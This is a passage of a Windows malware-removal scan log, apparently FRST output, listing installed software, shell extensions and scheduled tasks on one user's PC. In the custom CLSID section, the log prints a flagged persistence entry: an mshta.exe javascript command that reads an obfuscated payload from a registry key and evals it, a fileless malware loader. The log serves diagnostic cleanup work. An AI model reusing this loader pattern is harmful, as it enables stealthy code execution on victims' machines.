Microsoft Word 2010 (HKLM-x32\...\Office14.WORD) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Microtool version 1.1.0 (HKLM-x32\...\Microtool_is1) (Version: 1.1.0 - Microtool Technologies)
Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: 1.0 - Релиз от R.G. Steamgames)
Might & Magic X - Legacy (HKLM-x32\...\Might & Magic X - Legacy_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Might and Magic Heroes VII (HKLM-x32\...\Might and Magic Heroes VII_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, ProZorg_tm)
Might and Magic VIII: Day of the Destroyer (HKLM-x32\...\Might and Magic VIII: Day of the Destroyer_is1) (Version:  - GOG.com)
Minecraft1.8 (HKLM-x32\...\Minecraft1.8) (Version:  - )
Minecraft1.9 (HKLM-x32\...\Minecraft1.9) (Version:  - )
MiniTool Partition Wizard Free 9.1 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version:  - MiniTool Solution Ltd.)
Mozilla Firefox 32.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0 (x86 en-US)) (Version: 32.0 - Mozilla)
Mozilla Firefox 54.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 54.0.1 (x64 en-US)) (Version: 54.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 32.0 - Mozilla)
MSI Afterburner 4.2.0 (HKLM-x32\...\Afterburner) (Version: 4.2.0 - MSI Co., LTD)
My.com Game Center (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MyComGames) (Version: 3.196 - My.com B.V.)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version:  - NCSOFT)
Need for Speed™ Rivals (HKLM-x32\...\{E0A32336-AA27-4053-99B2-C3380B7B95AC}) (Version: 1.3.0.0 - Electronic Arts)
Nexon Game Manager (HKLM-x32\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.5 - Black Tree Gaming)
NieR.Automata - Day One Edition - Version 1787.043 (HKLM-x32\...\NieR.Automata - Day One Edition_is1) (Version: 1787.043 - RePack by VickNet)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.2 - Notepad++ Team)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.7.1.0 - Duodian Technology Co. Ltd.)
NVIDIA 3D Vision Driver 376.33 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.33 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.2.0.96 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.2.0.96 - NVIDIA Corporation)
NVIDIA Graphics Driver 376.33 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.33 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}) (Version: 9.09.1112 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.0.0.0 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenIV (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\OpenIV) (Version: 2.8.703 - .black/OpenIV Team)
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
Opera Stable 46.0.2597.57 (HKLM-x32\...\Opera 46.0.2597.57) (Version: 46.0.2597.57 - Opera Software)
OPPO售后驱动程序 1.4.0 (HKLM\...\{F9CA1F0B-D4A8-41C5-99AD-D39FFA50B09B}_is1) (Version: 1.4.0.8 - 广东欧珀移动通信有限公司)
Ori and the Blind Forest (HKLM-x32\...\Ori and the Blind Forest_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Outlast (HKLM-x32\...\Outlast_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Oxenfree (HKLM-x32\...\Oxenfree_is1) (Version:  - )
ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version:  - )
PAYDAY 2 (HKLM\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PlagueInc 1.0 (HKLM-x32\...\PlagueInc 1.0) (Version: 1.0 - Cat-A-Cat)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
QQ International (HKLM-x32\...\{3CA54984-A14B-42FE-9FF1-7EA90151D725}) (Version: 1.91.1369.0 - Tencent Technology(Shenzhen) Company Limited)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{CCD797F1-171F-4B3A-BD30-4F59F653E1A0}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{F45761DC-2470-47FF-9E9B-F4016568C29A}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Network Manager (HKLM\...\{4692B750-DE88-4DCF-9163-745AF5604B24}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.42.1045 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.21243 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7161 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Registry Repair 5.0.1.86 (HKLM-x32\...\Registry Repair) (Version: 5.0.1.86 - Glarysoft Ltd)
RenegadeX Alternative Launcher (HKLM-x32\...\{BF8E3C46-58F2-40E2-B107-BB93D05B7186}) (Version: 0.2.0 - Equabyte)
Resident Evil 7: Biohazard (HKLM-x32\...\Resident Evil 7: Biohazard_is1) (Version:  - )
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
RivaTuner Statistics Server 6.4.1 (HKLM-x32\...\RTSS) (Version: 6.4.1 - Unwinder)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.7.8 - Rockstar Games)
RogueKiller version 12.8.5.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.8.5.0 - Adlice Software)
Ryse - Son of Rome (HKLM-x32\...\Ryse - Son of Rome_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Sacred 3 (HKLM-x32\...\Sacred 3_is1) (Version:  - )
Sacred Citadel (HKLM-x32\...\Sacred Citadel_is1) (Version:  - )
Sacred Gold (HKLM-x32\...\GOGPACKSACREDGOLD_is1) (Version: 2.0.0.4 - GOG.com)
Samorost 3 (HKLM-x32\...\Samorost 3_is1) (Version: 1.0.0.0 - )
SDFormatter (HKLM-x32\...\{179324FF-7B16-4BA8-9836-055CAAEE4F08}) (Version: 4.0.0 - SD Association)
SecEditCtl.BOC (only remove) (HKLM-x32\...\SecEditCtl.BOC01000009) (Version:  - CFCA)
Shadowrun Dragonfall - Director's Cut (HKLM-x32\...\1207660913_is1) (Version: 2.0.4.6 - GOG.com)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0350 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden
Silence (HKLM-x32\...\1452682147_is1) (Version: 2.0.0.2 - GOG.com)
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Skyrim Legendary Edition (HKLM-x32\...\{42145802-221A-4576-A198-AEE3CB3387B0}) (Version: 1.9.32.0 - Xinica)
SMITE (HKLM\...\Steam App 386360) (Version:  - Hi-Rez Studios)
Sniper Elite 3 (HKLM-x32\...\U25pcGVyRWxpdGUz_is1) (Version: 1 - )
Sniper Elite 4 (HKLM-x32\...\Sniper Elite 4_is1) (Version:  - )
SoftEther VPN Server (HKLM\...\softether_sevpnserver) (Version: 4.21.9613 - SoftEther VPN Project)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Spore (HKLM-x32\...\Spore_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SSDlife Pro (HKLM-x32\...\{3EBFD83D-D221-4D8E-8762-93ED98DBE9F7}) (Version: 2.1.29 - BinarySense Inc.)
STAR WARS - The Force Unleashed II (HKLM-x32\...\STAR WARS - The Force Unleashed II_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Stellar Phoenix Windows Data Recovery - Professional (HKLM-x32\...\Stellar Phoenix Windows Data Recovery - Professional_is1) (Version: 6.0.0.1 - Stellar Information Technology Pvt Ltd.)
Stronghold Crusader 2 - Delivering Justice (HKLM-x32\...\Stronghold Crusader 2: Delivering Justice_is1) (Version: 2.2.0.7 - GOG.com)
Stronghold Crusader 2 - The Emperor and The Hermit (HKLM-x32\...\Stronghold Crusader 2: The Emperor and The Hermit_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Jackall and The Khan (HKLM-x32\...\Stronghold Crusader 2: The Jackall and The Khan_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Princess and The Pig (HKLM-x32\...\Stronghold Crusader 2: The Princess and The Pig_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Templar and The Duke (HKLM-x32\...\Stronghold Crusader 2: The Templar and The Duke_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 (HKLM-x32\...\1433852499_is1) (Version: 2.2.0.7 - GOG.com)
Stronghold Legends: Steam Edition (HKLM-x32\...\Stronghold Legends: Steam Edition_is1) (Version:  - )
StrongVPN Client (HKLM-x32\...\{6EB6293C-9286-4981-8672-956E1A92F33B}_is1) (Version: 1.5.1.0 - Black Oak Computers, Inc)
Subtitle Edit 3.5.3 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.3.0 - Nikse)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Expendabros (HKLM\...\Steam App 312990) (Version:  - Free Lives)
The Forest (HKLM\...\Steam App 242760) (Version:  - Endnight Games Ltd)
The Forest version The Forest (HKLM-x32\...\The Forest_is1) (Version: The Forest - )
THE GAME OF LIFE - The Official 2016 Edition (HKLM\...\dGhlZ2FtZW9mbGlmZXRoZW9mZmljaWFsMjAxNmVkaXRpb24_is1) (Version: 1 - )
THE KING OF FIGHTERS XIII STEAM EDITION (HKLM-x32\...\Steam App 222940) (Version:  - SNK Playmore)
THE KING OF FIGHTERS XIV STEAM EDITION (HKLM\...\Steam App 571260) (Version:  - SNK CORPORATION)
THE KING OF FIGHTERS XIV STEAM EDITION Closed Beta Test (HKLM\...\Steam App 620420) (Version:  - )
The Sims 4 (HKLM-x32\...\The Sims 4_is1) (Version:  - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.20.60.1020 - Electronic Arts Inc.)
The Universim - Mother Planet Demo (HKLM\...\Steam App 401980) (Version:  - Crytivo Games)
The Walking Dead - Season 2 (HKLM-x32\...\The Walking Dead - Season 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
The Walking Dead A New Frontier Episode 5 (HKLM-x32\...\The Walking Dead A New Frontier Episode 5_is1) (Version:  - )
The Witcher 3 - Wild Hunt (HKLM-x32\...\1495134320_is1) (Version: 2.0.0.51 - GOG.com)
The Witcher Adventure Game (HKLM-x32\...\1207666883_is1) (Version: 2.7.0.24 - GOG.com)
This War of Mine - Anniversary Edition (HKLM-x32\...\This War of Mine - Anniversary Edition_is1) (Version:  - )
This War of Mine (HKLM-x32\...\{5FD7B6B3-08C7-4FEE-9C37-A2134C699885}}_is1) (Version: 1 - 11 bit studios)
This War of Mine: The Little Ones (HKLM-x32\...\This War of Mine: The Little Ones_is1) (Version:  - )
Tiberium Wars 1.09 (HKLM-x32\...\Command & Conquer 3: Tiberium Wars_is1) (Version:  - HWMasters.com)
Transistor (HKLM-x32\...\Transistor_is1) (Version:  - )
Trine 2 -  Complete Story (HKLM-x32\...\GOGPACKTRINE2_is1) (Version: 2.0.0.4 - GOG.com)
Trine 2 (HKLM\...\Steam App 35720) (Version:  - Frozenbyte)
Trine 3 The Artifacts of Power (HKLM-x32\...\Trine 3 The Artifacts of Power_is1) (Version: 1.0.2 - )
Trine Enhanced Edition (HKLM-x32\...\1207659020_is1) (Version: 2.0.0.2 - GOG.com)
TunnelBear (HKLM-x32\...\{35184AD1-A3C9-4B38-A1F3-3D9C48EFAAEC}) (Version: 2.3.25.0 - TunnelBear) Hidden
TunnelBear (HKLM-x32\...\{90e7dc26-e7df-406b-af23-61df6728a9f6}) (Version: 2.3.25.0 - TunnelBear)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
UE3Redist (HKLM-x32\...\{6530FDAA-5B1F-4830-95BB-650E9804D239}) (Version: 1.00.0000 - Epic Games) Hidden
UE3Redist (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\InstallShield_{6530FDAA-5B1F-4830-95BB-650E9804D239}) (Version: 1.00.0000 - Epic Games)
UE4 Prerequisites (x64) (HKLM\...\{36EAD5CF-44EF-4FCF-8BE1-D96C4835D7A4}) (Version: 1.0.11.0 - Epic Games, Inc.) Hidden
UE4 Prerequisites (x64) (HKLM-x32\...\{2890ae6b-90e9-448d-b3e6-97e43c21e2fd}) (Version: 1.0.13.0 - Epic Games, Inc.) Hidden
UnionPay Security Non plug 1.0.0.2 (HKLM-x32\...\UnionPay Security Non plug) (Version: 1.0.0.2 - China UnionPay)
Uplay (HKLM-x32\...\Uplay) (Version: 7.4 - Ubisoft)
Valiant Hearts The Great War (HKLM-x32\...\Valiant Hearts The Great War_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Vegas Pro 10.0 (64-bit) (HKLM\...\{D207019F-D0A5-11DF-A282-0013D3D69929}) (Version: 10.0.388 - Sony)
Viridi (HKLM-x32\...\Steam App 375950) (Version:  - Ice Water Games)
Virtual Villagers 5 - New Believers (HKLM-x32\...\{0D46446A-5EC5-0983-4274-4B13C546FEF5}}_is1) (Version:  - Last Day of Work Games)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VSFilter 2.41.322 (0c3a1ea) Nightly (64-bit) (HKLM\...\vsfilter64_is1) (Version: 2.41.322 - MPC-HC Team)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Warhammer 40,000 Dawn of War III (HKLM-x32\...\Warhammer 40,000 Dawn of War III_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
WebM Project Directshow Filters (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\webmdshow) (Version:  - )
WIDCOMM BTW Development Kit (HKLM-x32\...\{0B75A75A-3D2C-479B-ACA0-A17A0B4B7628}) (Version: 6.1.0.1506 - Broadcom Corporation)
Windows Driver Package - BigNox Corporation (VBoxUSB) USB  (09/16/2015 4.3.12) (HKLM\...\76B144D15273552931249392EDB13C0BBD52C84E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation VBoxUSBMon System  (09/16/2015 4.3.12) (HKLM\...\39F54A37125643D2E1E90FA7D81F36ACC9441510) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation XQHDrv System  (09/16/2015 4.3.12) (HKLM\...\0147813640F7AF69F569581EE672B6BE1E71798E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WireShare (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\WireShare) (Version: 5.6.4.3 - WireShare)
Wondershare Dr.Fone for Android(Build 5.5.1.8) (HKLM-x32\...\{1DB91A95-C548-4BA5-9D4C-18C7DEAAC39F}_is1) (Version: 5.5.1.8 - Wondershare Software Co.,Ltd.)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
Wondershare PDFelement 6 Pro(Build 6.1.0) (HKLM-x32\...\{B026557A-EF19-4812-8A79-B30F94AA0A78}_is1) (Version: 6.1.0.2364 - Wondershare Software Co.,Ltd.)
Worms Reloaded (HKLM-x32\...\Steam App 22600) (Version:  - Team17 Software Ltd.)
WPS Office 2016 Premium (HKLM-x32\...\{25FE1012-A21C-42D7-9FAC-AD5299E2A0A3}) (Version: 10.1.0.5486 - SamuRa1)
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
Youtube Downloader HD v. 2.9.9.30 (HKLM-x32\...\Youtube Downloader HD_is1) (Version:  - YoutubeDownloaderHD.com)
乐视视频 V7.3.2.192 (HKLM-x32\...\乐视视频) (Version: V7.3.2.192 - 乐视网信息技术(北京)股份有限公司.)
优酷 (HKLM-x32\...\YoukuClient) (Version: 7.2.1.6011 - youkutudou, Inc.)
搜狗拼音输入法 8.0正式版 (HKLM-x32\...\Sogou Input) (Version: 8.0.0.8111 - Sogou.com)
百度网盘 (HKLM-x32\...\百度云管家) (Version: 5.5.5 - 百度在线网络技术(北京)有限公司)
英特尔® PROSet/无线软件 (HKLM-x32\...\{85b9d34f-7397-4e39-8600-07942ef6ca04}) (Version: 17.0.5 - Intel Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{5ed339e2-e6a7-576a-be70-fb9cdbdce50e}\InprocServer32 -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\npYoukuAgent_x64.dll (Youku)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{679F137C-3162-45da-BE3C-2F9C3D093F64}\InprocServer32 -> C:\Windows\system32\shdocvw.dll (Microsoft Corporation)
HKU\.DEFAULT\Software\Classes\b586d: "C:\Windows\system32\mshta.exe" "javascript:McWTU4a5i="TwujZb";N2E=new ActiveXObject("WScript.Shell");s6yGd="2GtCLhxi";QPf6U3=N2E.RegRead("HKCU\\software\\sfcc\\bymfflwgby");DNQ9RS="1OTKLf";eval(QPf6U3);M9MhRI7="LLhwqc";" <==== ATTENTION
ShellIconOverlayIdentifiers: [   Report64] -> {C7D0BD5D-B11A-47DB-BB14-7F930B3F7705} => C:\Users\w7\AppData\Roaming\ytmediacenter\X64\report64.dll [2015-10-10] (Youku.com)
ShellIconOverlayIdentifiers: [   YoukuModShlExt64] -> {314711D6-6B45-4AF7-83D8-DCD8537FD241} => C:\Users\w7\AppData\Roaming\ytmediacenter\X64\coreplay64.dll [2015-12-08] (Youku.com)
ShellIconOverlayIdentifiers-x32-x32: [   Report] -> {32C50D96-7A9E-4F3E-8763-F74D86AFEDC2} => C:\Users\w7\AppData\Roaming\ytmediacenter\report.dll [2015-10-10] (Youku.com)
ShellIconOverlayIdentifiers-x32-x32-x32: [   YoukuModShlExt] -> {9071723E-9F41-4A8C-9CC2-EB6F94BA9B9E} => C:\Users\w7\AppData\Roaming\ytmediacenter\coreplay.dll [2015-12-08] (Youku.com)
ContextMenuHandlers1: [360WangPanShell] -> {1D39A523-4DF5-4562-8FFF-08C740632F4F} => C:\Program Files (x86)\360\360WangPan\360WangPanShell64.dll [2016-03-22] (360.cn)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-11-02] ()
ContextMenuHandlers1: [Balabolka] -> {6CB83A5A-AA68-4895-9F54-175E789AE149} => C:\Program Files (x86)\Balabolka\BFileExt.dll [2013-03-01] (Ilya Morozov)
ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers1: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers1-x32: [YunShellExt] -> {6D85624F-305A-491d-8848-C1927AA0D790} => C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunShellExt64.dll [2017-05-18] ()
ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)
ContextMenuHandlers4: [360WangPanShell] -> {1D39A523-4DF5-4562-8FFF-08C740632F4F} => C:\Program Files (x86)\360\360WangPan\360WangPanShell64.dll [2016-03-22] (360.cn)
ContextMenuHandlers4: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers4: [YunShellExt] -> {6D85624F-305A-491d-8848-C1927AA0D790} => C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunShellExt64.dll [2017-05-18] ()
ContextMenuHandlers5: [DreamScene] -> {BE800AEB-A440-4B63-94CD-AA6B43647DF9} => C:\Windows\System32\DreamScene.dll [2015-08-29] (Microsoft Corporation)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-12-31] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-12-12] (NVIDIA Corporation)
ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers6: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-08-27] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {00C84079-6D5C-4523-884E-A350F671831A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation)
Task: {032A412F-90A5-4270-9A60-70046E0FF736} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate -nolegacy
Task: {0BC5E9EE-52FD-42C0-9401-6D204954CF46} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-12-13] (NVIDIA Corporation)
Task: {25B63122-3474-4A4D-9F89-C03EA259220C} - System32\Tasks\{CCAC4C17-1982-4B4C-B885-B96F34D9604F} => F:\Games\Mafia II\pc\Mafia2.exe [2011-02-04] (2K Czech)
Task: {2B08218F-710A-4477-A232-03CD78721B9A} - System32\Tasks\SBWUpdateTask_Time_7481e473-00FFDD369F91 => C:\Program Files (x86)\Common Files\Speedbit\SbUpdate\SBUpdate.exe [2017-05-01] (Speedbit Ltd.) <==== ATTENTION
Task: {301C98E8-146A-425C-A6D9-20979157B7B7} - System32\Tasks\{1A7F4EA1-5E1C-4FC2-8CEC-730F1A14FCC6} => C:\Windows\system32\pcalua.exe -a "C:\Users\w7\Downloads\vcredist_x64 (1).exe" -d C:\Users\w7\Downloads
Task: {3132AD68-44DB-4BA7-B6BA-2ACB404E28AF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {345BA0DE-6F8F-475D-A0EF-CFF03B65E553} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-08-09] (Adobe Systems Incorporated)
Task: {36B09B80-9334-4C54-9864-2B20D6FCF263} - System32\Tasks\Opera scheduled Autoupdate 1439020676 => C:\Program Files (x86)\Opera\launcher.exe [2017-07-18] (Opera Software)
Task: {3D8082AA-B5BD-4810-B4DE-AA5EBA3DA1BD} - System32\Tasks\Microsoft\Windows\PLA\System\{8A182A64-BC8F-491B-9FB4-325F73EDEB80}_System Diagnostics => C:\Windows\system32\rundll32.exe C:\Windows\system32\pla.dll,PlaHost "system\System Diagnostics" "$(Arg0)"
